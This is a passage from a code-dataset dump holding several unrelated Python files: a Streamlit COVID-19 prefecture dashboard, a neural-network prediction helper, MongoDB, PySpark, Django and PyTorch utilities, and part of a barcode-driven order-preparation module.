df_days = df_prefecture.loc[:, [\"年月日\", \"都道府県\", '陽性者数']]\n #年月日の差分\n df_days['陽性者数/日'] = df_days[\"陽性者数\"].diff()\n df_days = df_days.set_index(\"年月日\")\n # st.write(df_days)\n st.bar_chart(df_days[\"陽性者数/日\"])\n # st.line_chart(df_days[\"陽性者数/日\"])\n\n df['陽性率'] = df['陽性者数'] / df['検査数'] * 100\n df['復帰率'] = df['回復者数'] / df['陽性者数'] * 100\n df['療養率'] = df['療養者数'] / df['陽性者数'] * 100\n df['重症化率'] = df['重症者数'] / df['陽性者数'] * 100\n df['死亡率'] = df['死者数'] / df['陽性者数'] * 100\n\n # days = '2021-08-19'\n days = datetime.datetime.now() - datetime.timedelta(days=2)\n days = datetime.datetime.strftime(days, '%Y-%m-%d')\n\n df2 = df[['都道府県', '検査数', '陽性者数', '回復者数', '療養者数', '重症者数','死者数', '陽性率', '復帰率', '療養率', '重症化率', '死亡率']][df['年月日'] == days]\n\n df3 = pd.DataFrame(\n data=df2[['検査数', '陽性者数', '回復者数', '療養者数', '重症者数', '死者数']].sum())\n df3 = df3.T\n df3['陽性率'] = df3['陽性者数'] / df3['検査数'] * 100\n df3['復帰率'] = df3['回復者数'] / df3['陽性者数'] * 100\n df3['療養率'] = df3['療養者数'] / df3['陽性者数'] * 100\n df3['重症化率'] = df3['重症者数'] / df3['陽性者数'] * 100\n df3['死亡率'] = df3['死者数'] / df3['陽性者数'] * 100\n\n st.header('全国累計')\n df3 = df3.reset_index(drop=True)\n st.dataframe(df3)\n\n st.header('都道府県別・PCR検査陽性率(降順)')\n _df2 = df2[['都道府県','検査数','陽性者数','陽性率']].sort_values('陽性率',ascending=False)\n # _df2 = df2.set_index('都道府県')\n\n _df2 = _df2.set_index(\"都道府県\")\n\n st.dataframe(_df2,1000)\n st.bar_chart(_df2['陽性率'], use_container_width=True)\n\n st.header('都道府県別・感染から復帰率(降順)')\n __df2 = df2[['都道府県', '陽性者数', '回復者数', '復帰率']].sort_values('復帰率', ascending=False)\n __df2 = __df2.set_index(\"都道府県\")\n st.dataframe(__df2)\n\n st.header(f'{_prefectureNameJ}・回復者数/日')\n # df_prefecture = df.groupby('都道府県').get_group(_prefectureNameJ)\n df_days = df_prefecture.loc[:, [\"年月日\", \"都道府県\", '回復者数']]\n #年月日の差分\n df_days['回復者数/日'] = df_days[\"回復者数\"] + df_days[\"回復者数\"].diff()\n df_days = df_days.set_index(\"年月日\")\n # st.write(df_days)\n st.bar_chart(df_days[\"回復者数/日\"], use_container_width=True)\n\n\n st.header('都道府県別・療養率(降順)')\n __df2 = df2[['都道府県', '陽性者数', '療養者数', '療養率']].sort_values('療養率', ascending=False)\n __df2 = __df2.set_index(\"都道府県\")\n st.dataframe(__df2, width=1000)\n st.bar_chart(__df2['療養率'])\n\n st.header(f'{_prefectureNameJ}・療養者数/日')\n # df_prefecture = df.groupby('都道府県').get_group(_prefectureNameJ)\n df_days = df_prefecture.loc[:, [\"年月日\", \"都道府県\", '療養者数']]\n #年月日の差分\n df_days['療養者数/日'] = df_days[\"療養者数\"] + df_days[\"療養者数\"].diff()\n df_days = df_days.set_index(\"年月日\")\n # st.write(df_days)\n st.bar_chart(df_days[\"療養者数/日\"], use_container_width=True)\n\n\n st.header('都道府県別・重症化率(降順)')\n __df2 = df2[['都道府県', '陽性者数', '重症者数', '重症化率']].sort_values('重症化率', ascending=False)\n __df2 = __df2.set_index(\"都道府県\")\n st.dataframe(__df2, width=1000)\n st.bar_chart(__df2['重症化率'], use_container_width=True)\n\n st.header(f'{_prefectureNameJ}・重症者数/日')\n # df_prefecture = df.groupby('都道府県').get_group(_prefectureNameJ)\n df_days = df_prefecture.loc[:, [\"年月日\", \"都道府県\", '重症者数']]\n #年月日の差分\n df_days['重症者数/日'] = df_days[\"重症者数\"] + df_days[\"重症者数\"].diff()\n df_days = df_days.set_index(\"年月日\")\n # st.write(df_days)\n st.bar_chart(df_days[\"重症者数/日\"], use_container_width=True)\n\n\n st.header('都道府県別・死亡率(降順)')\n __df2 = df2[['都道府県', '陽性者数', '死者数', '死亡率']].sort_values('死亡率', ascending=False)\n __df2 = __df2.set_index(\"都道府県\")\n st.dataframe(__df2)\n st.bar_chart(__df2['死亡率'], use_container_width=True)\n\n st.header(f'{_prefectureNameJ}・死者数/日')\n # df_prefecture = df.groupby('都道府県').get_group(_prefectureNameJ)\n df_days = df_prefecture.loc[:, [\"年月日\", 
\"都道府県\", '死者数']]\n #年月日の差分\n df_days['死者数/日'] = df_days[\"死者数\"].diff()\n df_days = df_days.set_index(\"年月日\")\n # st.write(df_days)\n st.bar_chart(df_days[\"死者数/日\"], use_container_width=True)\n except:\n st.error(\n \"エラーがおきているようです。都道府県名を漢字で入力してください。\"\n )\n\ndata_visualize()\n\nst.write('Copyright © 2021 Tomoyuki Yoshikawa. All Rights Reserved.')\n","sub_path":"app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":8281,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"266421706","text":"from scipy.special import expit\nimport numpy as np\n\n\ndef sigmoid(z):\n \"\"\"\n Нет никакх причин добавлять эту функцию, можно просто использовать expit()\n\n :param z: любая матрица\n :return: матрица из элементов, знаения которых находятся в пределах 0..1\n \"\"\"\n return expit(z)\n\n\ndef predict(theta1, theta2, x):\n \"\"\"\n\n :param theta1: весовая матрица первого слоя нейросети\n :param theta2: весовая матрица второго слоя нейросети\n :param x: матрица входных параметров нейросети\n в данном случае каждой строке матрицы соответствует одно изображение\n строка состоит из 400 ячеек, которые представляют собой яркость пикселей изображения 20х20\n разложенные в одну строку\n :return:\n \"\"\"\n\n # m - получаем количество строк матрицы входных значения (количество изображений)\n m = x.shape[0]\n\n # ones - единичная матрица m - строк и 1 столбей\n ones = np.ones((m, 1))\n\n # a1 - конкатенация единичной матрицы слева от матрицы входных параметров\n a1 = np.c_[ones, x]\n\n # умножение матрицы входных параметров на матрицу весовых коэффициентов\n z2 = np.dot(a1, theta1.T)\n\n # функция sigmoid дает на выходе матрицу с элементами уложенными в пределы 0..1\n # результат функции sigmoid это выходные значения первого слоя нейросети и входные значения второго слоя\n # a2 - конкатенация 1й матрицы с матрицей входных параметров для 2го слоя матрицы\n a2 = np.c_[ones, sigmoid(z2)]\n \n # выход 2го уровня матрицы, до обработки сигмойдой\n z3 = np.dot(a2, theta2.T)\n \n # выход второго слоя после обработки сигмойдой\n h_x = sigmoid(z3)\n \n # возвращает индекс наибольшей величины для каждой строки матрицы\n # элемент, значение которого самое большое и есть предполжение нейросети\n p = np.argmax(h_x, axis=1)\n return p\n","sub_path":"functions/prediction.py","file_name":"prediction.py","file_ext":"py","file_size_in_byte":2790,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"45260529","text":"\"\"\"DB management functions\"\"\"\n\nimport os\nfrom pymongo import MongoClient\nimport pymongo\n\ntry:\n DB_URI_FILE = os.environ['DB_URI_FILE']\nexcept KeyError:\n raise RuntimeError(\n 'Pantrymatic failed to start: Must set file containing a MongoDB URI in environment '\n 'variable \"DB_URI_FILE\". 
URI format is mongodb://username:password@hostname:port/db_name'\n    )\nwith open(os.path.expanduser(DB_URI_FILE), 'r') as URI_FILE:\n    DB_URI = URI_FILE.read().strip()\n    DB_NAME = os.path.basename(DB_URI)\n    if not DB_NAME:\n        raise ValueError(f'Cannot parse DB_URI: {DB_URI}')\n\ndef get_db():\n    \"\"\"Returns a pymongo db client object.\"\"\"\n    client = MongoClient(DB_URI)\n    db = client[DB_NAME]\n    _create_indexes(db)\n    return db\n\ndef _create_indexes(db):\n    \"\"\"Creates all default indexes on the database.\"\"\"\n    db.users.create_index(\"email\", unique=True)\n    db.foods.create_index([(\"user\", pymongo.ASCENDING),\n                           (\"name\", pymongo.ASCENDING),\n                           (\"pack_size\", pymongo.ASCENDING)], unique=True)\n","sub_path":"pantrymatic/db.py","file_name":"db.py","file_ext":"py","file_size_in_byte":1073,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"130285724","text":"#dynamically take the table name from text file and clean the data for all tables\nfrom pyspark.sql.functions import col, count, isnan, lit, sum\nimport sys\nimport os\nimport subprocess\n#function to run hdfs command and check whether a directory already exists in hdfs or not\ndef run_cmd(args_list):\n    print('Running system command: {0}'.format(' '.join(args_list)))\n    proc = subprocess.Popen(args_list, stdout=subprocess.PIPE,\n                            stderr=subprocess.PIPE)\n    proc.communicate()\n    return proc.returncode\n#function to run any hdfs commands in pyspark\ndef run_cmd1(args_list):\n    print('Running system command: {0}'.format(' '.join(args_list)))\n    proc = subprocess.Popen(args_list, stdout=subprocess.PIPE,\n                            stderr=subprocess.PIPE)\n    (output, errors) = proc.communicate()\n    if proc.returncode:\n        raise RuntimeError(\n            'Error running command: %s. Return code: %d, Error: %s' % (\n                ' '.join(args_list), proc.returncode, errors))\n    return (output, errors)\n#function to count the total number of nulls for each column\ndef count_not_null(c, nan_as_null=False):\n    \"\"\"Count the nulls in column c by converting booleans to integers\n    - False -> 0\n    - True -> 1\n    \"\"\"\n    pred = col(c).isNull() & (~isnan(c) if nan_as_null else lit(True))\n    return sum(pred.cast(\"integer\")).alias(c)\nwith open('tablename.txt') as f:\n    for i in f:\n        i = i.rstrip('\\n')\n        spark.sql(\"Use miti_db\")\n        tables_df1 = spark.sql(\"show tables like \\'{}\\'\".format(i)).count()\n        if(tables_df1 == 0):\n            print(\"There is no table named {} in hive database\".format(i))\n        else:\n            i = i.rstrip('\\n')\n            print(\"table name: \"+ i);\n            storeprint = 0\n            tables_df = spark.sql(\"select * from miti_db.{}\".format(i))\n            print('count of {0} {1}'.format(i,tables_df.count()))\n            dropduplicate_tables_df =tables_df.dropDuplicates()\n            print('count of distinct {0} {1}'.format(i,dropduplicate_tables_df.count()))\n            dropnull=tables_df.dropna()\n            print('count after dropping null {0} {1}'.format(i,dropnull.count()))\n            dfschemafordistinct=tables_df.select([ col_name for col_name in tables_df.columns if tables_df.count()== dropduplicate_tables_df.count() ])\n            dfschemafordistinctstr=str(dfschemafordistinct)\n            columns = [ column for column in tables_df.columns if len(tables_df.select(column).distinct().collect()) == len(tables_df.select(column).collect()) ]\n            # df.select(columns).show()\n            printschema = tables_df.select(columns)\n            printschemastr = str(printschema)\n            # print(printschemastr)\n            # print(dfschemafordistinctstr)\n            #print(dfschemafordistinctstr)\n            #dfschemafordistinct.show(1)\n            #print(suppliers.select([ col_name for col_name in suppliers.columns if suppliers.count()== 
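The boolean-to-integer cast in count_not_null is the standard way to count nulls per column in PySpark. A self-contained version of that aggregation, where the local SparkSession and the toy rows are assumptions for illustration only:

from pyspark.sql import SparkSession
from pyspark.sql.functions import col
from pyspark.sql.functions import sum as spark_sum

spark = SparkSession.builder.master("local[1]").getOrCreate()
df = spark.createDataFrame([(1, None), (2, "x"), (None, "y")], ["a", "b"])

# isNull() yields booleans; casting to integer makes them summable per column.
df.agg(*[spark_sum(col(c).isNull().cast("integer")).alias(c)
         for c in df.columns]).show()   # a: 1, b: 1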
dropduplicatsupplier.count() ]))\n import re\n strprimarykey=re.findall(r'\\[(\\w+)',printschemastr)\n if not strprimarykey:\n print ('There is no primary key in this table')\n dropduplicate_tables_df = tables_df.dropDuplicates()\n dropnul_thresh3 = dropduplicate_tables_df.dropna(thresh=3)\n dropnul_thresh3.show(3)\n print('final count in table which has no primary key {0}'.format(dropnul_thresh3.count()))\n path = str(\"/user/miti/project_shellscript/alltables_cleansed/\")+i\n # print(path)\n\n cmd = ['hadoop', 'fs', '-test', '-e',path]\n code = run_cmd(cmd)\n # print(code)\n if code == 1:\n\n dropnul_thresh3.coalesce(1).write.format('com.databricks.spark.csv').options(header='true').save(path)\n print(\"File has been saved\")\n else:\n print(\"CSV File is already written\")\n\n else:\n # print(strprimarykey[0])\n print('Count of distinct_tables_df from subset, excluding primarykey column: {0}'.format(\n tables_df.select([\n col_name for col_name in tables_df.columns if col_name != strprimarykey[0]\n ]).distinct().count()))\n tables_df_dropduplicate_expk = tables_df.dropDuplicates(subset=[\n col_name for col_name in tables_df.columns if col_name != strprimarykey[0]])\n drop_null_thres3 = tables_df_dropduplicate_expk.dropna(thresh=3)\n # drop_null_thres3.show(3)\n print('final count after dropping row with three null values {0}'.format(drop_null_thres3.count()))\n path = str(\"/user/miti/project_shellscript/alltables_cleansed/\")+i\n # print(path)\n\n cmd = ['hadoop', 'fs', '-test', '-e',path]\n code = run_cmd(cmd)\n # print(code)\n if code == 1:\n drop_null_thres3.coalesce(1).write.format('com.databricks.spark.csv').options(header='true').save(path)\n else:\n print(\"CSV File is already written\")\n print(\"total null counts in Columns\")\n tables_df.agg(*[count_not_null(c) for c in tables_df.columns]).show()\n\n\nquit()\n\n","sub_path":"dynamic_script.py","file_name":"dynamic_script.py","file_ext":"py","file_size_in_byte":6719,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"120345587","text":"from django.urls import path\n\nfrom books import views\n\nurlpatterns = [\n path('', views.index, name='index'),\n path('book/', views.BookListView.as_view(), name='book_list'),\n path('book//', views.BookDetailView.as_view(), name='book-detail'),\n path('book/genres//', views.BookListView.as_view(), name='book_genre'),\n path('topten', views.topten, name='topten'),\n path('book/create/', views.BookCreateView.as_view(), name='book-create'),\n path('book//update/', views.BookUpdateView.as_view(), name='book-update'),\n path('book//delete/', views.BookDeleteView.as_view(), name='book-delete'),\n\n path('author/', views.AuthorListView.as_view(), name='author_list'),\n path('author//', views.AuthorDetailView.as_view(), name='author-detail'),\n path('author/create/', views.AuthorCreateView.as_view(), name='author-create'),\n path('author//update/', views.AuthorUpdateView.as_view(), name='author-update'),\n path('author//delete/', views.AuthorDeleteView.as_view(), name='author-delete')\n]\n","sub_path":"books/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":1083,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"39722945","text":"import os\r\n\r\nimport torch\r\nimport torch.utils\r\n\r\nimport numpy as np\r\nimport pandas\r\n\r\nfrom .folder_dataset import FolderDataset\r\nfrom torch.utils.data import DataLoader\r\n\r\n\r\ndef load_folder_data(root, train_val_rate, batch_size, 
test=False, train_width=None, test_width=None):\r\n # Load data\r\n print('1. Loading train data')\r\n train_path = os.path.join(root, 'train')\r\n train_labels_file = os.path.join(root, 'train_labels.csv')\r\n\r\n # Create datasets\r\n print('2. Creating datasets')\r\n dataset = FolderDataset(path=train_path, labels_csv=train_labels_file, do_transform=False, crop_time=True, width=test_width)\r\n train_length, validation_length = int(train_val_rate*len(dataset)), len(dataset) - int(train_val_rate*len(dataset))\r\n trainset, validationset = torch.utils.data.random_split(dataset, [train_length, validation_length])\r\n validationset.width = test_width\r\n\r\n # Create dataloaders\r\n print('3. Creating dataloaders')\r\n trainloader = DataLoader(trainset, batch_size=batch_size, shuffle=True, num_workers=4)\r\n validationloader = DataLoader(validationset, batch_size=batch_size, shuffle=True, num_workers=4)\r\n\r\n if test:\r\n # Get test data from images\r\n print('4. Loading test data')\r\n test_path = os.path.join(root, 'test')\r\n\r\n # Create datasets\r\n print('5. Creating test datasets')\r\n testset = FolderDataset(path=test_path, labels_csv=None, do_transform=False, crop_time=True, width=test_width)\r\n\r\n # Create dataloader\r\n print('6. Creating test dataloader')\r\n testloader = DataLoader(testset, batch_size=batch_size, shuffle=False, num_workers=4)\r\n\r\n # Load submission dataframe\r\n # submission_df = pandas.read_csv(os.path.join(root, 'submission_format.csv'))\r\n else:\r\n testloader = None\r\n # submission_df = None\r\n\r\n return trainloader, validationloader, testloader\r\n\r\n\r\ndef save_outputs(test_outputs, root, suffix):\r\n submission_df = pandas.read_csv(os.path.join(root, 'submission_format.csv'))\r\n submission_df['accent'] = test_outputs.astype(np.int64)\r\n submission_df.to_csv(os.path.join(root, suffix), index=False)\r\n","sub_path":"Classification/Accents/data_utils/data_util.py","file_name":"data_util.py","file_ext":"py","file_size_in_byte":2174,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"73601215","text":"\n# @class_declaration sanhigia_pedidos #\nfrom models.flfacturac.lineaspedidoscli import lineaspedidoscli\nfrom models.flfactppal.sh_trabajadores import sh_trabajadores\nfrom models.flfactalma.articulosprov import articulosprov\nfrom models.flfactalma import flfactalma_def\n\n\nclass sanhigia_pedidos(flfacturac):\n\n def sanhigia_pedidos_procesaCodBarras(self, model, oParam):\n # print(\"proceso\")\n # print(oParam)\n # Suma 1\n cantidad = 1\n qsatype.debug(oParam)\n # if str(oParam['codbarras']).endsith(\"\\x00\"):\n # qsatype.debug(\"tiene esos caracteres extraños\")\n qsatype.debug(ustr(\"lencodbarras \", len(oParam['codbarras'])))\n qsatype.debug(ustr(\"codigobarrasprevio \", oParam['codbarras']))\n # oParam['codbarras'] = re.sub(r\"/(\\\\x00)/g\", \" \", oParam['codbarras'])\n # oParam['codbarras'] = re.sub(r\"/(\\^@)/g\", \" \", oParam['codbarras'])\n # if len(oParam['codbarras']) > 35:\n # oParam['codbarras'] = oParam['codbarras'][:-32]\n # qsatype.debug(ustr(\"codigobarrasposterior \", oParam['codbarras']))\n\n if \"referencia\" in oParam:\n oParam['idpedido'] = model.pk\n oParam['idlinea'] = self.iface.dameIdLinea(oParam)\n if not oParam['idlinea']:\n return False\n # Ya no va a venir idlinea en oparam lo voy a meter yo, buscando lineas de model.pk que tengan esa referencia\n # Si tengo idlinea y codlote puedo asignar procesar el codigo de barras\n if \"idlinea\" in oParam and 
\"codlote\" in oParam:\n val = self.iface.insertarMovilote(oParam['idlinea'], oParam['referencia'], cantidad, model.codalmacen.codalmacen, oParam['codlote'])\n if val['status'] == 0:\n return True\n return val\n # Si idlinea y codproveedor en oParam tengo todo lo necesario para asignar un codigo de barras\n if \"idlinea\" in oParam and \"codproveedor\" in oParam:\n # print(\"viene por aqui 1\")\n referencia = qsatype.FLUtil.sqlSelect(\"lineaspedidoscli\", \"referencia\", \"idlinea = {}\".format(oParam['idlinea']))\n # linea = lineaspedidoscli.objects.get(pk=oParam['idlinea'])\n objcod = flfactalma_def.iface.datosLecturaCodBarras(oParam['codbarras'], oParam[\"codproveedor\"], referencia)\n porLotes = qsatype.FLUtil.sqlSelect(u\"articulos\", u\"porlotes\", \"referencia = '{}'\".format(referencia))\n if not porLotes and \"lote\" in objcod:\n objcod['lote'] = None\n asociado = flfactalma_def.iface.asociarCodBarras(referencia, oParam[\"codproveedor\"], objcod['codbarras'])\n if asociado and not objcod['lote']:\n val = self.iface.analizaCodBarras(model.pk, oParam['codbarras'], cantidad, model.codalmacen.codalmacen, oParam['idlinea'])\n qsatype.debug(ustr(\"analizado \", val))\n return self.iface.respuestaAnalizaCodBarras(model, oParam, val)\n return val\n else:\n val = self.iface.analizaCodBarrasLote(referencia, objcod['codbarras'], objcod['lote'], cantidad, oParam['idlinea'], model.codalmacen.codalmacen)\n qsatype.debug(ustr(\"analizado \", val))\n return self.iface.respuestaAnalizaCodBarras(model, oParam, val)\n return val\n\n # Si idlinea en oParam significa que me estan enviando un codigo de barras para asociar a un articulo de la linea\n if \"idlinea\" in oParam and \"codproveedor\" not in oParam:\n # print(\"viene por aqui 2\")\n # linea = lineaspedidoscli.objects.get(pk=oParam['idlinea'])\n referencia = qsatype.FLUtil.sqlSelect(\"lineaspedidoscli\", \"referencia\", \"idlinea = {}\".format(oParam['idlinea']))\n # proveedor = articulosprov.objects.filter(referencia__exact=linea.referencia)\n codproveedor = qsatype.FLUtil.sqlSelect(\"articulosprov\", \"codproveedor\", \"referencia = '{}'\".format(referencia))\n if codproveedor:\n # print(\"tengo idlinea y no proveedor pero \", proveedor[0].codproveedor, \" \", linea.referencia, \" \", oParam['codbarras'])\n objcod = flfactalma_def.iface.datosLecturaCodBarras(oParam['codbarras'], codproveedor, referencia)\n porLotes = qsatype.FLUtil.sqlSelect(u\"articulos\", u\"porlotes\", \"referencia = '{}'\".format(referencia))\n if not porLotes and \"lote\" in objcod:\n objcod['lote'] = None\n asociado = flfactalma_def.iface.asociarCodBarras(referencia, codproveedor, objcod['codbarras'])\n if asociado and not objcod['lote']:\n val = self.iface.analizaCodBarras(model.pk, oParam['codbarras'], cantidad, model.codalmacen.codalmacen, oParam['idlinea'])\n qsatype.debug(ustr(\"analizado \", val))\n return self.iface.respuestaAnalizaCodBarras(model, oParam, val)\n return val\n else:\n val = self.iface.analizaCodBarrasLote(referencia, objcod['codbarras'], objcod['lote'], cantidad, oParam['idlinea'], model.codalmacen.codalmacen)\n qsatype.debug(ustr(\"analizado \", val))\n return self.iface.respuestaAnalizaCodBarras(model, oParam, val)\n return val\n else:\n response = {}\n response['status'] = -1\n response['data'] = {\"codbarras\": oParam['codbarras'], \"cantidad\": cantidad, \"idlinea\": oParam[\"idlinea\"], \"referencia\": referencia}\n response['params'] = [\n {\n \"componente\": \"YBFieldDB\",\n \"prefix\": \"otros\",\n \"desc_name\": \"Proveedor\",\n 
\"verbose_name\": \"Proveedor\",\n \"tipo\": 5,\n \"rel\": \"articulosprov\",\n \"aplic\": \"almacen\",\n \"filtro\": {\"referencia\": None},\n \"key\": \"codproveedor\",\n \"desc\": \"nombre\",\n \"showpk\": False\n },\n {\n \"tipo\": 37,\n \"required\": True,\n \"verbose_name\": \"codbarras\",\n \"visible\": False,\n \"key\": \"codbarras\",\n \"validaciones\": None\n },\n {\n \"tipo\": 3,\n \"required\": False,\n \"verbose_name\": \"cantidad\",\n \"key\": \"cantidad\",\n \"visible\": False,\n \"validaciones\": None\n },\n {\n \"tipo\": 3,\n \"required\": False,\n \"verbose_name\": \"idlinea\",\n \"key\": \"idlinea\",\n \"visible\": False,\n \"validaciones\": None\n }\n ]\n return response\n return False\n\n # Solo viene codigo de barras y cantidad\n else:\n val = self.iface.analizaCodBarras(model.pk, oParam['codbarras'], cantidad, model.codalmacen.codalmacen, None)\n qsatype.debug(ustr(\"analizado \", val))\n # print(val)\n return self.iface.respuestaAnalizaCodBarras(model, oParam, val)\n\n return True\n\n def sanhigia_pedidos_dameIdLinea(self, oParam):\n if \"idpedido\" in oParam:\n where = u\"referencia = '{}' AND idpedido = '{}'\".format(oParam['referencia'], oParam['idpedido'])\n elif \"preparacion\" in oParam:\n # where = ustr(u\"referencia = '\", oParam['referencia'], \"' AND codpreparaciondepedido = '\", oParam['preparacion'], \"' AND sh_preparacion = 'En Curso'\")\n where = u\"referencia = '{}' AND codpreparaciondepedido = '{}' AND sh_preparacion = 'En Curso'\".format(oParam['referencia'], oParam['preparacion'])\n else:\n return False\n query = qsatype.FLSqlQuery()\n query.setTablesList(u\"lineaspedidoscli\")\n query.setSelect(u\"idlinea, referencia, cantidad, shcantalbaran, totalenalbaran\")\n query.setFrom(u\"lineaspedidoscli\")\n query.setWhere(where)\n idLinea = -1\n if query.exec_():\n if query.size() > 1:\n while query.next():\n total = int(query.value('totalenalbaran') or 0)\n if int(query.value('cantidad')) != int(query.value('shcantalbaran') or 0) + int(total):\n idLinea = query.value(0)\n if query.size() == 1:\n if query.next():\n idLinea = query.value(0)\n # if not idLinea:\n # idLinea = query.value(0)\n return idLinea\n\n def sanhigia_pedidos_respuestaAnalizaCodBarras(self, model, oParam, val):\n # Si se produce un error que no permite modificar el pedido\n # Suma 1\n cantidad = 1\n if val['status'] == -3:\n return val\n\n # -1 Si el codigo de barras no pertenece a nigun articulo y algun articulo del pedido no tienen codigo de barras\n if val['status'] == -1:\n opts = []\n # print(\"________________\")\n # print(val)\n query = val['param']\n while query.next():\n opt = {}\n opt['key'] = query.value(0)\n opt['alias'] = query.value(0) + \" - \" + query.value(1)\n opts.append(opt)\n response = {}\n response['status'] = -1\n response['data'] = {\"codbarras\": oParam['codbarras'], \"cantidad\": cantidad}\n response['params'] = [\n {\n \"componente\": \"YBFieldDB\",\n \"tipo\": 90,\n \"verbose_name\": \"Opts\",\n \"label\": \"Asignar el Código de Barras a un articulo\",\n \"style\": {\"width\": \"700px\"},\n \"key\": \"referencia\",\n \"validaciones\": None,\n \"opts\": opts\n },\n {\n \"tipo\": 37,\n \"required\": True,\n \"verbose_name\": \"codbarras\",\n \"visible\": False,\n \"key\": \"codbarras\",\n \"validaciones\": None\n },\n {\n \"tipo\": 3,\n \"required\": False,\n \"verbose_name\": \"cantidad\",\n \"key\": \"cantidad\",\n \"visible\": False,\n \"validaciones\": None\n }\n ]\n return response\n\n # va por lotes y no tengo codlote\n if val['status'] == 2:\n opts = 
[]\n query = val['param']['query']\n while query.next():\n opt = {}\n opt['key'] = query.value(\"codlote\")\n formatofecha = \"%d/%m/%Y\"\n fecha = query.value(\"caducidad\").strftime(formatofecha)\n descLote = query.value(\"descripcion\") or \"\"\n opt['alias'] = query.value(\"codigo\") + \" - \" + str(int(query.value(\"enalmacen\"))) + \" - \" + str(fecha) + \" - \" + descLote\n opts.append(opt)\n response = {}\n response['status'] = -1\n\n response['data'] = {\n \"codbarras\": oParam['codbarras'],\n \"cantidad\": cantidad,\n \"idlinea\": val['param']['idlinea'],\n \"referencia\": val['param']['referencia']\n }\n\n response['params'] = [\n {\n \"componente\": \"YBFieldDB\",\n \"tipo\": 90,\n \"verbose_name\": \"Opts\",\n \"label\": \"Asignar lote\",\n \"style\": {\"width\": \"700px\"},\n \"key\": \"codlote\",\n \"validaciones\": None,\n \"opts\": opts\n },\n {\n \"tipo\": 37,\n \"required\": True,\n \"verbose_name\": \"codbarras\",\n \"visible\": False,\n \"key\": \"codbarras\",\n \"validaciones\": None\n },\n {\n \"tipo\": 3,\n \"required\": False,\n \"verbose_name\": \"cantidad\",\n \"key\": \"cantidad\",\n \"visible\": False,\n \"validaciones\": None\n },\n {\n \"tipo\": 3,\n \"required\": False,\n \"verbose_name\": \"idlinea\",\n \"key\": \"idlinea\",\n \"visible\": False,\n \"validaciones\": None\n },\n {\n \"tipo\": 3,\n \"required\": False,\n \"verbose_name\": \"referencia\",\n \"key\": \"referencia\",\n \"visible\": False,\n \"validaciones\": None\n }\n ]\n return response\n return True\n\n def sanhigia_pedidos_pedidoListoPDA(self, model, oParam):\n lineasServidas = qsatype.FLUtil.sqlSelect(\"lineaspedidoscli\", \"COUNT(idlinea)\", \"idpedido = '{}' AND shcantalbaran is not null and shcantalbaran > 0\".format(model.idpedido))\n if not lineasServidas or lineasServidas == 0:\n resul = {}\n resul['status'] = -1\n resul['msg'] = \"No es posible completar no existen líneas para servir\"\n return resul\n if \"pesobultos\" not in oParam:\n valor = parseFloat(qsatype.FLUtil.sqlSelect(u\"articulos a INNER JOIN lineaspedidoscli l ON a.referencia = l.referencia \", u\"SUM(a.peso*l.shcantalbaran)\", \"l.idpedido = {}\".format(model.idpedido), u\"articulos,lineaspedidoscli\"))\n # valor = qsatype.FLUtil.roundFieldValue(valor, u\"albaranescli\", u\"peso\")\n if valor < 1:\n valor = 1\n response = {}\n response['status'] = -1\n\n response['data'] = {\n \"pesobultos\": valor\n }\n\n response['params'] = [\n {\n \"tipo\": 16,\n \"required\": True,\n \"verbose_name\": \"Nº de Bultos\",\n \"key\": \"canbultos\",\n \"null\": True,\n \"validaciones\": None\n },\n {\n \"tipo\": 16,\n \"required\": True,\n \"verbose_name\": \"Peso Bultos\",\n \"key\": \"pesobultos\",\n \"null\": True,\n \"visible\": True,\n \"validaciones\": None\n }\n ]\n return response\n elif \"codagencia\" not in oParam:\n # print(\"_______________BBBBBBBBBBBBBBBBBBBBBB_______________\")\n valor = parseFloat(qsatype.FLUtil.sqlSelect(u\"lineaspedidoscli\", u\"SUM((pvptotal / cantidad) * shcantalbaran)\", u\"idpedido = {} AND shcantalbaran > 0\".format(model.idpedido)))\n if oParam['canbultos'] is None:\n oParam['canbultos'] = 0\n codAgencia = qsatype.FLUtil.sqlSelect(u\"reglas_tarifa\", u\"codagencia\", u\"codpais = '{0}' AND provincias like '%''{1}''%' AND ({2} >= pesodesde and ({2} <= pesohasta or pesohasta IS NULL)) AND ({3} >= bultosdesde and ({3} <= bultoshasta or bultoshasta IS NULL)) AND ({4} >= importedesde and ({4} <= importehasta or importehasta IS NULL)) ORDER BY orden ASC\".format(model.codpais.codpais, 
model.idprovincia.idprovincia, oParam['pesobultos'], oParam['canbultos'], valor))\n if not codAgencia or codAgencia is None:\n response = {}\n response['status'] = -1\n\n response['data'] = {\n \"pesobultos\": oParam['pesobultos'],\n \"canbultos\": oParam['canbultos']\n }\n\n response['params'] = [\n {\n \"tipo\": 16,\n \"required\": True,\n \"verbose_name\": \"Nº de Bultos\",\n \"key\": \"canbultos\",\n \"null\": True,\n \"validaciones\": None,\n \"visible\": False\n },\n {\n \"tipo\": 16,\n \"required\": True,\n \"verbose_name\": \"Peso Bultos\",\n \"key\": \"pesobultos\",\n \"null\": True,\n \"visible\": False,\n \"validaciones\": None\n },\n {\n \"tipo\": 5,\n \"componente\": \"YBFieldDB\",\n \"prefix\": \"otros\",\n \"rel\": \"agenciastrans\",\n \"aplic\": \"pedidoscli\",\n \"key\": \"codagencia\",\n \"desc\": \"codagencia\",\n \"verbose_name\": \"Agencia\",\n \"null\": True\n }\n ]\n return response\n else:\n tarifaDefecto = \"\"\n q = qsatype.FLSqlQuery()\n q.setTablesList(u\"productosagtrans\")\n q.setSelect(u\"codproductoagt, descripcion\")\n q.setFrom(u\"productosagtrans\")\n q.setWhere(u\"codagencia = '{}'\".format(codAgencia))\n if not q.exec_():\n return False\n\n obj = {}\n while q.next():\n obj[q.value(\"descripcion\")] = q.value(\"codproductoagt\")\n tarifaDefecto = qsatype.FLUtil.sqlSelect(u\"agenciastrans\", u\"codproductoagtdefecto\", u\"codagencia = '{}'\".format(codAgencia))\n codzona = 